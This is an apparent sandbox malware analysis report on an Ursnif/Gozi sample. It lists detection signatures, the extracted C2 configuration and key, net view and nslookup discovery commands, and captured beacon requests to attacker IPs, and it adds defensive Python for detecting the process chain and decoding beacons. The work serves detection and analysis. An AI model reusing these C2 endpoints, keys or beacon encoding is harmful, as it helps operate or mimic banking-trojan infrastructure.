Windows Analysis Report
Lx6.exe

Overview

General Information

Sample Name: Lx6.exe
Analysis ID: 720586
MD5: 3b892bea0f8cbe0b61ee380743567d1d
SHA1: 90522132e3a97e966e5270a8e105cc33f0d6c4e5
SHA256: 6b722961edc010c5487de4ef7eee84b586ac3c3f06dbd1920935ea5f7bb90543
Tags: 185.212.47.133, 194.76.225.60, 912135074, exe, Gozi, Opendir, tel12-msn-com

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Uses net.exe to modify the status of services
Machine Learning detection for sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Queries the current domain controller via net
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

AV Detection

Source: Lx6.exe ReversingLabs: Detection: 66%
Source: Lx6.exe Virustotal: Detection: 63%
Source: Lx6.exe Avira: detected
Source: Lx6.exe Joe Sandbox ML: detected
Source: 0.0.Lx6.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.Lx6.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: Lx6.exe Malware Configuration Extractor: Ursnif
{
  "RSA Public Key": "t3qotb1uLz0WQBQfwLqib6qEJZE+UWboYbVA8D0wT+tWlc5qtQDeaqzOC2nQDK16TGqueaW5oGs4CGiO/MdFt2KusjJx8+1kpFAzW86uZJOIIf4iTEkhS3MyiIa/Q7lcVfHfnxpB+UbYYggJs5GX2bL7AmnKln9+gOVwUuO7JAeDw+DtYHnZsQ5QWiILRjbhzgULABNMELryH3vhxO50soxjs3xWLliZ7NkotkIovW5lDNqd0O2XXyoOurxXjuZGPEbbhRZBpHdWEhqREXH1enS9abglL6UWQWXDddw6a+cdOzlsIkv4dFlHNnlldLue5uJRFh2QmHZUYokW7tGSKTbEnFyrm9DfIThSGsj+rn4=",
  "c2_domain": ["tel12.msn.com", "194.76.225.60", "185.212.47.133"],
  "botnet": "1900",
  "server": "50",
  "serpent_key": "0FL5S9PzrGv40a6p",
  "sleep_time": "1",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
Source: Lx6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00768664 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_00768664
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00752299
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_00761577
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0075154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 35_2_03022299
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 35_2_0302154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 35_2_03031577
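The net view commands above, and the nslookup 127.0.0.1 and ping localhost -n 5 process creations listed under Networking below, are individually unremarkable living-off-the-land commands; what makes them worth alerting on is that one cmd.exe parent issues several of them in a row. The following detection is an added example written for this report, not part of the Joe Sandbox output or of any product. It correlates process-creation events by parent PID against rules built from the command lines this report lists; the PIDs, the benign administrator shell and the del command (the report only states "Self deletion via cmd or bat file" and shows no command line) are constructed assumptions.

```python
"""Flag a shell that chains the discovery/evasion primitives seen in this report."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """The subset of a Sysmon Event ID 1 / Security 4688 record needed here."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# (rule name, image basename, command-line pattern). The command lines are the
# ones this report lists; the self-delete pattern is only described in the
# report ("Self deletion via cmd or bat file"), so its regex is an assumption.
RULES = [
    ("net_view_recon", "net.exe",
     re.compile(r"^net\s+view(\s+/all)?(\s+/domain)?\s*$", re.I)),
    ("nslookup_loopback", "nslookup.exe",
     re.compile(r"^nslookup\s+127\.0\.0\.1\s*$", re.I)),
    # ping to localhost with -n N sends N echo requests one second apart, which
    # is roughly an (N-1) second sleep without any suspicious API call
    ("ping_sleep", "ping.exe",
     re.compile(r"^ping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+", re.I)),
    ("cmd_self_delete", "cmd.exe",
     re.compile(r"\bdel\b.*\.exe", re.I)),
]

# Constructed events modelled on this report's process tree (PIDs invented).
EVENTS = [
    ProcEvent(4100, 2300, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(4104, 4100, r"C:\Windows\System32\net.exe", "net view"),
    ProcEvent(4108, 4100, r"C:\Windows\System32\net.exe", "net view /all /domain"),
    ProcEvent(4112, 4100, r"C:\Windows\System32\nslookup.exe", "nslookup 127.0.0.1"),
    ProcEvent(4116, 4100, r"C:\Windows\System32\PING.EXE", "ping localhost -n 5"),
    ProcEvent(4120, 4100, r"C:\Windows\System32\cmd.exe",
              r'cmd /c del "C:\Users\user\Desktop\Lx6.exe"'),
    # An administrator's shell: one discovery command on its own is not enough.
    ProcEvent(5000, 900, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(5004, 5000, r"C:\Windows\System32\net.exe", "net view"),
    ProcEvent(5008, 5000, r"C:\Windows\System32\PING.EXE", "ping 8.8.8.8 -n 1"),
]


def match_rules(ev: ProcEvent) -> set[str]:
    """Names of every rule whose image basename and command line match this event."""
    base = PureWindowsPath(ev.image).name.lower()
    return {name for name, image, pat in RULES if base == image and pat.search(ev.cmdline)}


def find_suspicious_parents(events: list[ProcEvent], threshold: int = 2) -> dict[int, set[str]]:
    """Correlate by parent PID: a parent whose children trip `threshold` or more
    distinct rules is reported together with the rule names that fired."""
    hits: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        hits[ev.ppid] |= match_rules(ev)
    return {ppid: names for ppid, names in hits.items() if len(names) >= threshold}


if __name__ == "__main__":
    for ppid, names in find_suspicious_parents(EVENTS).items():
        print(f"parent pid {ppid}: {sorted(names)}")
```

Correlating on the parent rather than alerting per command is what keeps the administrator shell (one net view, one real ping) out of the result while the injected shell, which runs all four primitives, is reported with the full list of what it did.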

Networking

Source: C:\Windows\explorer.exe Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe Domain query: www.msn.com
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49701 -> 52.169.118.173:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic Snort IDS: 2021814 ET TROJAN Ursnif Variant CnC Beacon 3 192.168.2.4:49703 -> 194.76.225.61:80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: global traffic HTTP traffic detected:
GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 194.76.225.60
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 194.76.225.60
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 194.76.225.60
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 194.76.225.60
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.msn.com
Source: global traffic HTTP traffic detected:
GET /de-ch/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.msn.com
Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.msn.com
Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected:
GET /de-ch/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.msn.com
Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected:
GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Host: 194.76.225.61
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Host: 194.76.225.61
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Host: 194.76.225.61
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Host: 194.76.225.61
Content-Length: 54
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a
Data Ascii: 11-10-2022 15:04:25 | "0xaaa494e7_6314cd46c4ff5" | 0
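The beacon paths above are what the two Snort signatures (2033203 "URI Struct M1 (_2B)" and 2033204 "URI Struct M2 (_2F)") key on: the bot base64-encodes an encrypted request, replaces the characters that are not URL-safe with the tokens _2B and _2F, scatters path separators through the result and appends a fake file name such as 9.drr or a.gif. The separators can land inside a token, which the first request shows ("C8YfqfqOL0fd_2/Faja_2Bey" is "_2F" split by a slash), so a decoder has to strip the slashes before undoing the substitution. The following decoder is an added example written for this report, not tooling from the sandbox or from any published ISFB analysis. The _2B and _2F tokens come from the signature names on this page; the "_0A" for "=" mapping is an assumption carried over from other ISFB write-ups and is never exercised by the sample. The first request to 194.76.225.60 is embedded as the sample input; the round-trip payload is constructed. The output is still Serpent-CBC ciphertext under the extracted serpent_key, and decrypting it is left out because the standard library has no Serpent.

```python
"""Decode the URI path of an ISFB/Ursnif beacon back to its raw ciphertext bytes."""
import base64
import re
from urllib.parse import urlsplit

# Escape tokens the bot substitutes into the base64 blob. "_2B" and "_2F" are the
# two that the ET rules 2033203/2033204 on this page match on; the "_0A" -> "="
# mapping is an assumption taken from other ISFB write-ups, not from this report.
ESCAPES = {"_2B": "+", "_2F": "/", "_0A": "="}

# First beacon from this report (GET to 194.76.225.60), copied verbatim.
SAMPLE_URI = (
    "http://194.76.225.60/doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/"
    "jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/"
    "E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/"
    "xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/"
    "kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr"
)


def split_beacon_path(path: str) -> tuple:
    """'/doorway/<blob split by slashes>/<tail>.<ext>' -> (directory, joined blob, ext)."""
    parts = path.strip("/").split("/")
    if len(parts) < 2:
        raise ValueError("not a nested beacon path")
    directory, segments = parts[0], parts[1:]
    name, dot, ext = segments[-1].rpartition(".")
    if dot:  # drop the fake extension, keep whatever precedes it (it is blob data)
        segments[-1] = name
    return directory, "".join(segments), ext


def normalized_base64(uri: str) -> str:
    """Reverse the URL transform. Slashes are removed first (the join in
    split_beacon_path) because the bot inserts them anywhere, including inside
    an escape token; only then are the tokens mapped back to base64 characters."""
    _, blob, _ = split_beacon_path(urlsplit(uri).path)
    for token, char in ESCAPES.items():
        blob = blob.replace(token, char)
    if not re.fullmatch(r"[A-Za-z0-9+/=]*", blob):
        raise ValueError("unexpected characters after un-escaping: %r" % blob)
    return blob


def decode_beacon_uri(uri: str) -> bytes:
    """Raw bytes carried by the URI. The bot drops base64 padding, so it is
    restored here. The result is still ciphertext (Serpent-CBC under the
    configuration's serpent_key); decrypting it is a separate step."""
    b64 = normalized_base64(uri).rstrip("=")
    if len(b64) % 4 == 1:
        raise ValueError("base64 length %d cannot come from an encoder" % len(b64))
    return base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)


def encode_beacon_uri(data: bytes, host: str = "194.76.225.60", directory: str = "doorway",
                      ext: str = "drr", segment: int = 13) -> str:
    """Inverse transform, used only to build a known-answer test. The real bot
    places the slashes at random offsets; fixed-width segments are enough to
    exercise the slash-inside-escape case."""
    b64 = base64.b64encode(data).decode().rstrip("=")
    escaped = b64.replace("+", "_2B").replace("/", "_2F")
    chunks = [escaped[i:i + segment] for i in range(0, len(escaped), segment)]
    return "http://%s/%s/%s.%s" % (host, directory, "/".join(chunks), ext)


def looks_like_isfb_beacon(uri: str) -> bool:
    """Loose structural check in the spirit of the two ET signatures: a deep path
    whose segments carry '_2B'/'_2F' and that ends in a three-letter extension.
    A production rule pairs this with the MSIE 8.0 user agent seen above."""
    path = urlsplit(uri).path
    return (path.count("/") >= 4
            and any(tok in path for tok in ("_2B", "_2F"))
            and re.search(r"\.[a-z]{3}$", path) is not None)


if __name__ == "__main__":
    raw = decode_beacon_uri(SAMPLE_URI)
    print("beacon shape:", looks_like_isfb_beacon(SAMPLE_URI))
    print("ciphertext bytes:", len(raw), "remainder mod 16:", len(raw) % 16)
```

The pattern is the same for the .gif requests to 194.76.225.61; only the directory and fake extension differ. Note the last request above, which sends a 54-byte body on a GET: the decoded path tells you which request type it is, but the Content-Length and the cleartext body ("11-10-2022 15:04:25 | ... | 0") are already enough to pick that beacon out of proxy logs.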
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, 
csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 